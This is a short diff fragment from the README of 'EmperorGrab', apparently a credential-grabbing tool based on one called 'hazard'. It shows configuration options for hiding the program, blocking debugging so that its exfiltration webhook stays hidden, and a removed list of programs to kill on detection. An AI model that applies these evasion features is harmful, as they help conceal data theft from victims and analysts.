EmperorTLM/EmperorGrab/README.md

     'hide_self': True,
     # does it's best to prevent the program from being debugged and drastically reduces the changes of your webhook being found
     'anti_debug': True,
-    # this list of programs will be killed if hazard detects that any of these are running, you can add more if you want
-    'blackListedPrograms':
-    [
-      ...
-    ]

-}
 ```

 ---